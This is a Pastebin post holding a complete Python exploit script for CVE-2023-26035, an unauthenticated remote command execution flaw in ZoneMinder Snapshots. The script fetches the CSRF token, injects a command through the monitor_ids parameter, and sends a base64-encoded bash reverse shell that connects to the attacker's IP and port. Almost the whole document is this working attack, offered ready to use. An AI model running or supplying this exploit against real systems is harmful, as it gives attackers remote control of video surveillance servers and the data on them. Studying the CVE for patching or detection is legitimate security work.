FlyFar

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE - CVE-2023-26035

Mar 21st, 2024
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.36 KB | Cybersecurity | 0 0
  1. import re
  2. import requests
  3. from bs4 import BeautifulSoup
  4. import argparse
  5. import base64
  6.  
  7. # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
  8. # Date: 12 December 2023
  9. # Discovered by : @Unblvr1
  10. # Exploit Author: Ravindu Wickramasinghe (@rvizx9)
  11. # Vendor Homepage: https://zoneminder.com/
  12. # Software Link: https://github.com/ZoneMinder/zoneminder
  13. # Version: prior to 1.36.33 and 1.37.33
  14. # Tested on: Arch Linux, Kali Linux
  15. # CVE : CVE-2023-26035
  16. # Github Link : https://github.com/rvizx/CVE-2023-26035
  17.  
  18.  
  19. class ZoneMinderExploit:
  20.     def __init__(self, target_uri):
  21.         self.target_uri = target_uri
  22.         self.csrf_magic = None
  23.  
  24.     def fetch_csrf_token(self):
  25.         print("[>] fetching csrt token")
  26.         response = requests.get(self.target_uri)
  27.         self.csrf_magic = self.get_csrf_magic(response)
  28.         if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):
  29.             print(f"[>] recieved the token: {self.csrf_magic}")
  30.             return True
  31.         print("[!] unable to fetch or parse token.")
  32.         return False
  33.  
  34.     def get_csrf_magic(self, response):
  35.         return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)
  36.  
  37.     def execute_command(self, cmd):
  38.         print("[>] sending payload..")
  39.         data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}
  40.         response = requests.post(f"{self.target_uri}/index.php", data=data)
  41.         print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")
  42.  
  43.     def exploit(self, payload):
  44.         if self.fetch_csrf_token():
  45.             print(f"[>] executing...")
  46.             self.execute_command(payload)
  47.  
  48. if __name__ == "__main__":
  49.     parser = argparse.ArgumentParser()
  50.     parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
  51.     parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
  52.     parser.add_argument('-p', '--port', required=True, help='port')
  53.     args = parser.parse_args()
  54.  
  55.     # generating the payload
  56.     ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"  
  57.     ps2 = base64.b64encode(ps1.encode()).decode()
  58.     payload = f"echo {ps2} | base64 -d | /bin/bash"
  59.  
  60.     ZoneMinderExploit(args.target_url).exploit(payload)
  61.            
Add Comment
Please, Sign In to add comment